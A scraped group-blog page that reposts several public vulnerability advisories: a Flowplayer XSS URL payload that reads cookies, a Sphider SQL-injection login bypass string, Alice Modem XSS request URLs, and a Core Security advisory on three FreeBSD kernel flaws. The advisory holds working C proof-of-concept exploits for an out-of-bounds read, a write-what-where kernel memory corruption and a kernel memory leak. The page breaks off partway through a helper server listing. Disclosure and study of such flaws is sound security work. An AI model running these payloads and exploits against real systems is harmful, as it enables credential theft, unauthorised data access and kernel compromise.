source: https://www.securityfocus.com/bid/48651/info
Flowplayer is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Flowplayer 3.2.7 is vulnerable; other versions may also be affected.
http://www.example.com/flowplayer/flowplayer-3.2.7.swf?config={%22clip%22:{%22url%22:%22http://www.example.com/vod/demo.flowplayervod/flowplayer-700.flv%22,%20%22linkUrl%22:%22javascript:alert%28String.fromCharCode%2888,83,83%29%29;alert%28document.cookie%29%22},%22screen%22:{%22height%22:%22100pct%22,%22top%22:0},%22plugins%22:{%22controls%22:{%22timeColor%22:%22#ffffff%22,%22borderRadius%22:%220px%22,%22buttonOffColor%22:%22rgba%28130,130,130,1%29%22,%22bufferGradient%22:%22none%22,%22sliderColor%22:%22#000000%22,%22zIndex%22:1,%22backgroundColor%22:%22rgba%280,%200,%200,%200%29%22,%22scrubberHeightRatio%22:0.6,%22tooltipTextColor%22:%22#ffffff%22,%22volumeSliderGradient%22:%22none%22,%22spacing%22:{%22time%22:6,%22volume%22:8,%22all%22:2},%22sliderGradient%22:%22none%22,%22timeBorderRadius%22:20,%22timeBgHeightRatio%22:0.8,%22volumeSliderHeightRatio%22:0.6,%22progressGradient%22:%22none%22,%22height%22:26,%22volumeColor%22:%22#4599ff%22,%22tooltips%22:{%22marginBottom%22:5,%22buttons%22:false},%22timeSeparator%22:%22%20%22,%22name%22:%22controls%22,%22volumeBarHeightRatio%22:0.2,%22opacity%22:1,%22timeFontSize%22:12,%22left%22:%2250pct%22,%22tooltipColor%22:%22rgba%280,%200,%200,%200%29%22,%22bufferColor%22:%22#a3a3a3%22,%22volumeSliderColor%22:%22#ffffff%22,%22border%22:%220px%22,%22buttonColor%22:%22#ffffff%22,%22durationColor%22:%22#b8d9ff%22,%22autoHide%22:{%22enabled%22:true,%22hideDelay%22:500,%22hideStyle%22:%22fade%22,%22mouseOutDelay%22:500,%22hideDuration%22:400,%22fullscreenOnly%22:true},%22backgroundGradient%22:%22none%22,%22width%22:%22100pct%22,%22sliderBorder%22:%221px%20solid%20rgba%28128,%20128,%20128,%200.7%29%22,%22display%22:%22block%22,%22buttonOverColor%22:%22#ffffff%22,%22url%22:%22flowplayer.controls-3.2.5.swf%22,%22timeBorder%22:%220px%20solid%20rgba%280,%200,%200,%200.3%29%22,%22progressColor%22:%22#4599ff%22,%22timeBgColor%22:%22rgb%280,%200,%200,%200%29%22,%22scrubberBarHeightRatio%22:0.2,%22bottom%22:0,%22builtIn%22:false,%22volumeBorder%22:%221px%20solid%20rgba%28128,%20128,%20128,%200.7%29%22,%22margins%22:[2,12,2,12]}}}
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863130978
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
source: https://www.securityfocus.com/bid/48647/info
Sphider is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example input is available:
Username: ' or 0=0 #
Password: ' or 0=0 #
source: https://www.securityfocus.com/bid/48642/info
The Alice Modem is prone to a cross-site scripting vulnerability and a denial-of-service vulnerability because the device fails to properly handle user-supplied input.
An attacker may leverage these issues to cause a denial-of-service condition or to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. Successfully exploiting the cross-site scripting issue may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/natAdd?apptype=userdefined&rulename=%22%3E%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=99
http://www.example.com/natAdd?apptype=userdefined&rulename=%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E%3Cx+y=&waninterface=ipwan&inthostip1=192&inthostip2=168&inthostip3=1&inthostip4=199&protocol1=proto_6&extportstart1=1&extportend1=1&intportstart1=1&intportend1=1&protocol2=proto_6&extportstart2=&extportend2=&intportstart2=&intportend2=&protocol3=proto_6&extportstart3=&extportend3=&intportstart3=&intportend3=
Core Security - Corelabs Advisory
http://corelabs.coresecurity.com/
FreeBSD Kernel Multiple Vulnerabilities
1. *Advisory Information*
Title: FreeBSD Kernel Multiple Vulnerabilities
Advisory ID: CORE-2015-0003
Advisory URL: http://www.coresecurity.com/content/freebsd-kernel-multiple-vulnerabilities
Date published: 2015-01-27
Date of last update: 2015-01-27
Vendors contacted: FreeBSD
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Unsigned to Signed Conversion Error [CWE-196], Improper Validation of Array Index [CWE-129], Improper Validation of Array Index [CWE-129]
Impact: Code execution, Denial of service
Remotely Exploitable: No
Locally Exploitable: Yes
CVE Name: CVE-2014-0998, CVE-2014-8612, CVE-2014-8612
3. *Vulnerability Description*
FreeBSD is an advanced computer operating system used to power modern servers, desktops and embedded platforms.
A large community has continually developed it for more than thirty years. Its advanced networking,
security and storage features have made FreeBSD the platform of choice for many of the busiest web sites
and most pervasive embedded networking and storage devices.
Multiple vulnerabilities have been found in the FreeBSD kernel code that implements
the vt console driver (previously known as Newcons) and the code that implements SCTP sockets.
These vulnerabilities could allow local unprivileged attackers to disclose kernel memory containing
sensitive information, crash the system, and execute arbitrary code with superuser privileges.
4. *Vulnerable packages*
. FreeBSD 10.1-RELEASE.
Other versions may be affected too but they were no checked.
5. *Non-vulnerable packages*
. FreeBSD 10.1-RELENG.
6. *Vendor Information, Solutions and Workarounds*
The FreeBSD team has released patches for the reported vulnerabilities. You should upgrade to FreeBSD 10.1-RELENG or one of the following releases:
. stable/10, 10.1-STABLE
. releng/10.1, 10.1-RELEASE-p5
. releng/10.0, 10.0-RELEASE-p17
. stable/9, 9.3-STABLE
. releng/9.3, 9.3-RELEASE-p9
. stable/8, 8.4-STABLE
. releng/8.4, 8.4-RELEASE-p23
The vendor publish a security Advisory that can be accessed here[6].
7. *Credits*
This vulnerability was discovered and researched by Francisco Falcon from Core Exploit Writers Team. The publication of this advisory was coordinated by Joaquin Rodriguez Varela from Core Advisories Team.
8. *Technical Description / Proof of Concept Code*
8.1. *FreeBSD vt Driver VT_WAITACTIVE Sign Conversion Vulnerability*
[CVE-2014-0998]
FreeBSD 10.1-RELEASE added[1] the 'vt(4)'[2] console driver (previously known as Newcons[3]). This new console driver can be enabled by adding the line 'kern.vty=vt' to the '/boot/loader.conf' file and then rebooting the system.
The vt console driver is prone to a sign conversion error when handling the 'VT_WAITACTIVE' ioctl message, which can be ultimately leveraged by a local unprivileged attacker to make the kernel access an array outside of its boundaries.
The vt console driver provides multiple virtual terminals, which are mapped to the '/dev/ttyv*' device nodes. A user can send messages to the vt driver by opening the '/dev/ttyv*' device node belonging to his virtual terminal and then using the 'ioctl' system call.
The function 'vtterm_ioctl' in 'sys/dev/vt/vt_core.c' handles ioctl messages sent to the vt driver. One of the supported messages is called 'VT_WAITACTIVE':
/-----
static int
vtterm_ioctl(struct terminal *tm, u_long cmd, caddr_t data,
struct thread *td)
{
int error, i, s;
[...]
switch (cmd) {
[...]
case VT_WAITACTIVE:
error = 0;
i = *(unsigned int *)data;
if (i > VT_MAXWINDOWS)
return (EINVAL);
if (i != 0)
vw = vd->vd_windows[i - 1];
[...]
-----/
As shown above, when handling the 'VT_WAITACTIVE' ioctl message, the 'data' input buffer (which is fully controlled by the local user) is casted as '(unsigned int *)' in order to read an 'unsigned int' from the input data; however, the read value is stored in the 'i' variable, which has *signed* type 'int'.
This sign conversion error will make possible for a local attacker to bypass the subsequent boundary check that tries to ensure that 'i' is not greater than 'VT_MAXWINDOWS' before using it as an index to access the 'vd->vd_windows' array. This flaw can be leveraged by a local attacker to make the kernel access the 'vd->vd_windows' array outside of its boundaries.
The following disassembly snippet represents the vulnerable code in the FreeBSD kernel binary ('/boot/kernel/kernel'):
/-----
vtterm_ioctl+1306 loc_C09B2506: ; CODE XREF: vtterm_ioctl+D6Cj
vtterm_ioctl+1306 cmp esi, 20047606h ; case VT_WAITACTIVE:
vtterm_ioctl+130C mov ecx, edx ; ecx = vd->vd_windows
vtterm_ioctl+130E mov eax, ebx
vtterm_ioctl+1310 jnz loc_C09B275B
vtterm_ioctl+1316 mov eax, [eax] ; i = *(unsigned int *)data;
vtterm_ioctl+1318 cmp eax, 0Ch ; if (i > VT_MAXWINDOWS)...
vtterm_ioctl+131B mov edi, 16h
vtterm_ioctl+1320 jg loc_C09B2760 ; *** signed comparison!
vtterm_ioctl+1326 test eax, eax ; if (i != 0)...
vtterm_ioctl+1328 jz short loc_C09B2531
vtterm_ioctl+132A mov eax, [ecx+eax*4-4] ; **** vw = vd->vd_windows[i - 1]; ---> access vd->vd_windows outside of its boundaries
vtterm_ioctl+132E mov [ebp+var_30], eax
-----/
8.2. *FreeBSD SCTP Socket SCTP_SS_VALUE Memory Corruption Vulnerability*
[CVE-2014-8612]
FreeBSD implements the Stream Control Transmission Protocol (SCTP).[4]. A userland application can use the 'getsockopt/setsockopt' system calls in order to manipulate the options associated with an SCTP socket.
The FreeBSD kernel is prone to a memory corruption vulnerability when setting the 'SCTP_SS_VALUE' SCTP socket option via the 'setsockopt' system call. This vulnerability can be leveraged by a local unprivileged attacker to corrupt kernel memory with an arbitrary 16-bit value.
The handling of the 'setsockopt' system call at the SCTP level is performed by the function 'sctp_setopt' [file 'sys/netinet/sctp_userreq.c']:
/-----
static int
sctp_setopt(struct socket *so, int optname, void *optval, size_t optsize,
void *p)
{
[...]
switch (optname) {
[...]
case SCTP_SS_VALUE:
{
struct sctp_stream_value *av;
SCTP_CHECK_AND_CAST(av, optval, struct sctp_stream_value, optsize);
SCTP_FIND_STCB(inp, stcb, av->assoc_id);
if (stcb) {
if (stcb->asoc.ss_functions.sctp_ss_set_value(stcb, &stcb->asoc, &stcb->asoc.strmout[av->stream_id],
av->stream_value) < 0) {
-----/
As shown above, when handling the 'SCTP_SS_VALUE' socket option, the 'optval' option value (which is fully controlled by the local user), is casted to the 'struct sctp_stream_value *' type and stored into the 'av' variable by using the 'SCTP_CHECK_AND_CAST' macro. After that, if the 'sctb' pointer is not 'NULL' (condition that can be achieved by having the SCTP socket in a *connected* state), then the 'stcb->asoc.ss_functions.sctp_ss_set_value' function pointer is called. The third argument for this function is '&stcb->asoc.strmout[av->stream_id]'. As can be seen, the unstrusted 'av->stream_id' value (which is fully controlled by the local attacker) is used as an index within the 'stcb->asoc.strmout' array without properly checking if it's within the bounds of the array.
However, note that the memory address calculated using the untrusted index is not dereferenced yet; just the calculated address is passed as an argument to the function, so there is still no memory access at this point.
'stcb->asoc.ss_functions' has type 'struct sctp_ss_functions', which is a struct defined in the file 'sys/netinet/sctp_structs.h' containing several function pointers. One of its members is 'sctp_ss_set_value', which is the one being called when handling the 'SCTP_SS_VALUE' socket option:
/-----
/*
* RS - Structure to hold function pointers to the functions responsible
* for stream scheduling.
*/
struct sctp_ss_functions {
void (*sctp_ss_init) (struct sctp_tcb *stcb, struct sctp_association *asoc,
int holds_lock);
void (*sctp_ss_clear) (struct sctp_tcb *stcb, struct sctp_association *asoc,
int clear_values, int holds_lock);
void (*sctp_ss_init_stream) (struct sctp_stream_out *strq, struct sctp_stream_out *with_strq);
void (*sctp_ss_add_to_stream) (struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, struct sctp_stream_queue_pending *sp, int holds_lock);
int (*sctp_ss_is_empty) (struct sctp_tcb *stcb, struct sctp_association *asoc);
void (*sctp_ss_remove_from_stream) (struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, struct sctp_stream_queue_pending *sp, int holds_lock);
struct sctp_stream_out *(*sctp_ss_select_stream) (struct sctp_tcb *stcb,
struct sctp_nets *net, struct sctp_association *asoc);
void (*sctp_ss_scheduled) (struct sctp_tcb *stcb, struct sctp_nets *net,
struct sctp_association *asoc, struct sctp_stream_out *strq, int moved_how_much);
void (*sctp_ss_packet_done) (struct sctp_tcb *stcb, struct sctp_nets *net,
struct sctp_association *asoc);
int (*sctp_ss_get_value) (struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, uint16_t * value);
int (*sctp_ss_set_value) (struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, uint16_t value);
};
-----/
The file 'sys/netinet/sctp_ss_functions.c' defines an array called 'sctp_ss_functions'; each element of this array has type 'struct sctp_ss_functions' and defines a set of function pointers suitable for different SCTP socket options:
/-----
struct sctp_ss_functions sctp_ss_functions[] = {
/* SCTP_SS_DEFAULT */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_default_clear,
.sctp_ss_init_stream = sctp_ss_default_init_stream,
.sctp_ss_add_to_stream = sctp_ss_default_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_default_remove,
.sctp_ss_select_stream = sctp_ss_default_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
},
/* SCTP_SS_ROUND_ROBIN */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_default_clear,
.sctp_ss_init_stream = sctp_ss_default_init_stream,
.sctp_ss_add_to_stream = sctp_ss_rr_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_default_remove,
.sctp_ss_select_stream = sctp_ss_default_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
},
/* SCTP_SS_ROUND_ROBIN_PACKET */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_default_clear,
.sctp_ss_init_stream = sctp_ss_default_init_stream,
.sctp_ss_add_to_stream = sctp_ss_rr_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_default_remove,
.sctp_ss_select_stream = sctp_ss_rrp_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_rrp_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
},
/* SCTP_SS_PRIORITY */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_prio_clear,
.sctp_ss_init_stream = sctp_ss_prio_init_stream,
.sctp_ss_add_to_stream = sctp_ss_prio_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_prio_remove,
.sctp_ss_select_stream = sctp_ss_prio_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_prio_get_value,
.sctp_ss_set_value = sctp_ss_prio_set_value
},
/* SCTP_SS_FAIR_BANDWITH */
{
.sctp_ss_init = sctp_ss_default_init,
.sctp_ss_clear = sctp_ss_fb_clear,
.sctp_ss_init_stream = sctp_ss_fb_init_stream,
.sctp_ss_add_to_stream = sctp_ss_fb_add,
.sctp_ss_is_empty = sctp_ss_default_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_fb_remove,
.sctp_ss_select_stream = sctp_ss_fb_select,
.sctp_ss_scheduled = sctp_ss_fb_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
},
/* SCTP_SS_FIRST_COME */
{
.sctp_ss_init = sctp_ss_fcfs_init,
.sctp_ss_clear = sctp_ss_fcfs_clear,
.sctp_ss_init_stream = sctp_ss_fcfs_init_stream,
.sctp_ss_add_to_stream = sctp_ss_fcfs_add,
.sctp_ss_is_empty = sctp_ss_fcfs_is_empty,
.sctp_ss_remove_from_stream = sctp_ss_fcfs_remove,
.sctp_ss_select_stream = sctp_ss_fcfs_select,
.sctp_ss_scheduled = sctp_ss_default_scheduled,
.sctp_ss_packet_done = sctp_ss_default_packet_done,
.sctp_ss_get_value = sctp_ss_default_get_value,
.sctp_ss_set_value = sctp_ss_default_set_value
}
};
-----/
Note that the value for the 'sctp_ss_set_value' field is *almost* always set to 'sctp_ss_default_set_value', which is just a dummy function defined in 'sys/netinet/sctp_ss_functions.c':
/-----
static int
sctp_ss_default_set_value(struct sctp_tcb *stcb SCTP_UNUSED, struct sctp_association *asoc SCTP_UNUSED,
struct sctp_stream_out *strq SCTP_UNUSED, uint16_t value SCTP_UNUSED)
{
/* Nothing to be done here */
return (-1);
}
-----/
The only case in which the 'sctp_ss_set_value' field is set to a different value is in the 4th element of the array, which corresponds to the 'SCTP_SS_PRIORITY' socket option; in that case, the function pointer is set to 'sctp_ss_prio_set_value', which is a function defined in 'sys/netinet/sctp_ss_functions.c':
/-----
static int
sctp_ss_prio_set_value(struct sctp_tcb *stcb, struct sctp_association *asoc,
struct sctp_stream_out *strq, uint16_t value)
{
if (strq == NULL) {
return (-1);
}
strq->ss_params.prio.priority = value;
sctp_ss_prio_remove(stcb, asoc, strq, NULL, 1);
sctp_ss_prio_add(stcb, asoc, strq, NULL, 1);
return (1);
}
-----/
The 'value' parameter is fully controlled by the attacker, and the actual value of the 'strq' pointer parameter is the address '&stcb->asoc.strmout[av->stream_id]' in which the attacker can set the 'av->stream_id' index beyond the boundaries of the array, so this function will provide a write-what-where memory corruption primitive when doing the 'strq->ss_params.prio.priority = value' assignment. This memory corruption vulnerability allows a local unprivileged attacker to overwrite kernel memory outside of the 'stcb->asoc.strmout' array with an arbitrary 'uint16_t' value.
In order to make use of the 'sctp_ss_prio_set_value' function, the attacker needs to set up the 'stcb->asoc.ss_functions' struct with the function pointers belonging to the 'SCTP_SS_PRIORITY' socket option. This can be done by hitting the following code in the 'sctp_setopt' function; as can be seen, the 'stcb->asoc.ss_functions' struct can be properly set up for the attack by setting an 'SCTP_PLUGGABLE_SS' socket option with an option value of type 'struct sctp_assoc_value' having its 'assoc_value' field set to 'SCTP_SS_PRIORITY' (see the 'stcb->asoc.ss_functions = sctp_ss_functions[av->assoc_value] ' statement):
/-----
case SCTP_PLUGGABLE_SS:
{
struct sctp_assoc_value *av;
SCTP_CHECK_AND_CAST(av, optval, struct sctp_assoc_value, optsize);
/* Checks if av->assoc_value is a valid index within the sctp_ss_functions array */
if ((av->assoc_value != SCTP_SS_DEFAULT) &&
(av->assoc_value != SCTP_SS_ROUND_ROBIN) &&
(av->assoc_value != SCTP_SS_ROUND_ROBIN_PACKET) &&
(av->assoc_value != SCTP_SS_PRIORITY) &&
(av->assoc_value != SCTP_SS_FAIR_BANDWITH) &&
(av->assoc_value != SCTP_SS_FIRST_COME)) {
SCTP_LTRACE_ERR_RET(inp, NULL, NULL, SCTP_FROM_SCTP_USRREQ, EINVAL);
error = EINVAL;
break;
}
SCTP_FIND_STCB(inp, stcb, av->assoc_id);
if (stcb) {
stcb->asoc.ss_functions.sctp_ss_clear(stcb, &stcb->asoc, 1, 1);
/* The function pointers struct is set up here!!! */
stcb->asoc.ss_functions = sctp_ss_functions[av->assoc_value];
stcb->asoc.stream_scheduling_module = av->assoc_value;
stcb->asoc.ss_functions.sctp_ss_init(stcb, &stcb->asoc, 1);
SCTP_TCB_UNLOCK(stcb);
-----/
8.3. *FreeBSD SCTP Socket SCTP_SS_VALUE Kernel Memory Disclosure Vulnerability*
[CVE-2014-8612]
The third vulnerability is closely related to the second one. The FreeBSD kernel is prone to a kernel memory disclosure when reading the value of the 'SCTP_SS_VALUE' SCTP socket option via the 'getsockopt' system call, which allows local unprivileged attackers to read 16-bit values belonging to the kernel memory space.
The handling of the 'getsockopt' system call at the SCTP level is performed by the function 'sctp_getopt' [file 'sys/netinet/sctp_userreq.c']:
/-----
static int
sctp_getopt(struct socket *so, int optname, void *optval, size_t *optsize,
void *p)
{
[...]
switch (optname) {
[...]
case SCTP_SS_VALUE:
{
struct sctp_stream_value *av;
SCTP_CHECK_AND_CAST(av, optval, struct sctp_stream_value, *optsize);
SCTP_FIND_STCB(inp, stcb, av->assoc_id);
if (stcb) {
if (stcb->asoc.ss_functions.sctp_ss_get_value(stcb, &stcb->asoc, &stcb->asoc.strmout[av->stream_id],
&av->stream_value) < 0) {
-----/
When handling the 'SCTP_SS_VALUE' socket option, the 'optval' option value (which is fully controlled by the local attacker), is casted to the 'struct sctp_stream_value *' type and stored into the 'av' variable by using the 'SCTP_CHECK_AND_CAST' macro. After that, if the 'sctb' pointer is not 'NULL' (condition that can be achieved by having the SCTP socket in a *connected* state), the 'stcb->asoc.ss_functions.sctp_ss_get_value' function pointer is called. The third argument for this function is '&stcb->asoc.strmout[av->stream_id]'. As can be seen, the unstrusted 'av->stream_id' value (which is fully controlled by the local attacker) is used as an index within the 'stcb->asoc.strmout' array without properly checking if it's within the bounds of the array.
The default value for the 'sctp_ss_get_value' function pointer is 'sctp_ss_default_get_value', which is just a dummy function defined in 'sys/netinet/sctp_ss_functions.c':
/-----
static int
sctp_ss_default_get_value(struct sctp_tcb *stcb SCTP_UNUSED, struct sctp_association *asoc SCTP_UNUSED,
struct sctp_stream_out *strq SCTP_UNUSED, uint16_t * value SCTP_UNUSED)
{
/* Nothing to be done here */
return (-1);
}
-----/
The only useful possible value for this function pointer is 'sctp_ss_prio_get_value', which belongs to the function pointers of the 'SCTP_SS_PRIORITY' socket option:
/-----
static int
sctp_ss_prio_get_value(struct sctp_tcb *stcb SCTP_UNUSED, struct sctp_association *asoc SCTP_UNUSED,
struct sctp_stream_out *strq, uint16_t * value)
{
if (strq == NULL) {
return (-1);
}
*value = strq->ss_params.prio.priority;
return (1);
}
-----/
The actual value of the 'strq' pointer parameter is the address '&stcb->asoc.strmout[av->stream_id]' in which the attacker can set the 'av->stream_id' index beyond the boundaries of the array, so this function will allow a local unprivileged attacker to read an 'uint16_t' value belonging to the kernel memory outside of the 'stcb->asoc.strmout' array when doing the '*value = strq->ss_params.prio.priority' assignment.
In order to make use of the 'sctp_ss_prio_get_value' function, the attacker needs to set up the 'stcb->asoc.ss_functions' struct with the function pointers belonging to the 'SCTP_SS_PRIORITY' socket option, as it was previously explained for the second vulnerability.
8.4. *Proof of Concept*
The following code is a Proof of Concept for the first vulnerability:
/-----
#include <stdio.h>
#include <sys/consio.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char **argv){
int fd;
printf("** FreeBSD vt Driver VT_WAITACTIVE Sign Conversion Vulnerability PoC **\n");
if (argc < 2){
printf("\nUsage: ./poc_vt </dev/ttyv*>, where ttyv* is your current virtual terminal.\n");
printf("\nExample: ./poc_vt /dev/ttyv1\n\n");
exit(1);
}
fd = open(argv[1], O_RDONLY);
if (fd == -1){
perror("open");
exit(1);
}
/* 0x90919293 is a negative number when it's interpreted as a signed int, thus it will bypass the
* (signed) boundary check that tries to guarantee that this value is not greater than VT_MAXWINDOWS (12).
* This value will be ultimately used as an index to access the vd->vd_windows array.
*/
if (ioctl(fd, VT_WAITACTIVE, (void *) 0x90919293) == -1){
perror("ioctl");
}
close(fd);
return 0;
}
-----/
The following code is a Proof of Concept for the second vulnerability:
/-----
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <netinet/sctp_uio.h>
#include <arpa/inet.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define PORT 4444
#define ADDR "127.0.0.1"
int main(int argc, char *argv[]) {
int fd;
struct sockaddr_in addr;
struct sctp_initmsg init;
struct sctp_stream_value stream_value;
struct sctp_assoc_value assoc_value;
socklen_t opt_len;
printf("** FreeBSD SCTP Socket SCTP_SS_VALUE Memory Corruption Vulnerability PoC **\n");
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)) < 0) {
perror("socket");
goto out;
}
memset(&init, 0, sizeof(init));
init.sinit_num_ostreams = 2048;
if (setsockopt(fd, IPPROTO_SCTP, SCTP_INITMSG, &init, (socklen_t)sizeof(struct sctp_initmsg)) < 0) {
perror("SCTP_INITMSG");
goto out;
}
memset(&addr, 0, sizeof(addr));
#ifdef HAVE_SIN_LEN
addr.sin_len = sizeof(struct sockaddr_in);
#endif
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr(ADDR);
if (connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) {
perror("connect");
goto out;
}
/* Set up the stcb->asoc.ss_functions struct with the function pointers belonging to the SCTP_SS_PRIORITY socket option */
memset(&assoc_value, 0, sizeof(assoc_value));
assoc_value.assoc_value = SCTP_SS_PRIORITY;
assoc_value.assoc_id = SCTP_CURRENT_ASSOC;
if (setsockopt(fd, IPPROTO_SCTP, SCTP_PLUGGABLE_SS, &assoc_value, (socklen_t)sizeof(struct sctp_assoc_value)) < 0){
perror("setting up function pointers");
goto out;
}
memset(&stream_value, 0, sizeof(stream_value));
stream_value.assoc_id = SCTP_CURRENT_ASSOC;
/*
* stream_id will be used as an index into the stcb->asoc.strmout array without performing bounds checking.
* stream_value will be written to the calculated address.
*/
stream_value.stream_id = 0xFFFF;
stream_value.stream_value = 0x4142;
/* Triggering the vulnerability... */
if (setsockopt(fd, IPPROTO_SCTP, SCTP_SS_VALUE, &stream_value, (socklen_t)sizeof(struct sctp_stream_value)) < 0){
perror("triggering the vulnerability");
goto out;
}
out:
if (close(fd) < 0) {
perror("close");
}
return(0);
}
-----/
The following code is a Proof of Concept for the third vulnerability:
/-----
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <netinet/sctp_uio.h>
#include <arpa/inet.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define PORT 4444
#define ADDR "127.0.0.1"
int main(int argc, char *argv[]) {
int fd;
struct sockaddr_in addr;
struct sctp_initmsg init;
struct sctp_stream_value stream_value;
struct sctp_assoc_value assoc_value;
socklen_t opt_len;
printf("** FreeBSD SCTP Socket SCTP_SS_VALUE Kernel Memory Disclosure Vulnerability **\n");
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_SCTP)) < 0) {
perror("socket");
goto out;
}
memset(&init, 0, sizeof(init));
init.sinit_num_ostreams = 2048;
if (setsockopt(fd, IPPROTO_SCTP, SCTP_INITMSG, &init, (socklen_t)sizeof(struct sctp_initmsg)) < 0) {
perror("SCTP_INITMSG");
goto out;
}
memset(&addr, 0, sizeof(addr));
#ifdef HAVE_SIN_LEN
addr.sin_len = sizeof(struct sockaddr_in);
#endif
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr(ADDR);
if (connect(fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) < 0) {
perror("connect");
goto out;
}
/* Set up the stcb->asoc.ss_functions struct with the function pointers belonging to the SCTP_SS_PRIORITY socket option */
memset(&assoc_value, 0, sizeof(assoc_value));
assoc_value.assoc_value = SCTP_SS_PRIORITY;
assoc_value.assoc_id = SCTP_CURRENT_ASSOC;
if (setsockopt(fd, IPPROTO_SCTP, SCTP_PLUGGABLE_SS, &assoc_value, (socklen_t)sizeof(struct sctp_assoc_value)) < 0){
perror("setting up function pointers");
goto out;
}
memset(&stream_value, 0, sizeof(stream_value));
opt_len = sizeof(stream_value);
stream_value.assoc_id = SCTP_CURRENT_ASSOC;
/* stream_id will be used as an index into the stcb->asoc.strmout array without performing bounds checking. */
stream_value.stream_id = 0x400;
/* Triggering the vulnerability... */
if (getsockopt(fd, IPPROTO_SCTP, SCTP_SS_VALUE, &stream_value, &opt_len) < 0){
perror("triggering the vulnerability");
goto out;
}
printf("[*] Value leaked from kernel: 0x%04X\n", stream_value.stream_value);
out:
if (close(fd) < 0) {
perror("close");
}
return(0);
}
-----/
Note that both the second and third PoCs try to connect to a dummy SCTP server listening on localhost on port 4444, since the SCTP socket needs to be in a 'connected' state in order to trigger the vulnerabilities. The following code, based on the example code published here[5], can be used to run a simple SCTP server listening on port 4444:
/-----
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <arpa/inet.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#define BUFFER_SIZE (1<<16)
#define PORT 4444
#define ADDR "127.0.0.1"
int main(int argc, char *argv[]) {
int fd, n, flags;
struct sockaddr_in addr;
socklen_t from_len;
struct sctp_sndrcvinfo sinfo;
char buffer[BUFFER_SIZE];
struct sctp_event_subscribe event;
if ((fd = socket(AF_INET, SOCK_SEQPACKET, IPPROTO_SCTP)) < 0) {
perror("socket");
goto out;
}
memset(&event, 1, sizeof(struct sctp_event_subscribe));
if (setsockopt(fd, IPPROTO_SCTP, SCTP_EVENTS, &event, sizeof(struct sctp_event_subscribe)) < 0) {
perror("setsockopt");
goto out;
}
memset(&addr, 0, sizeof(struct sockaddr_in));
#ifdef HAVE_SIN_LEN
addr.sin_len = sizeof(struct sockaddr_in);
#endif
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = inet_addr(ADDR);
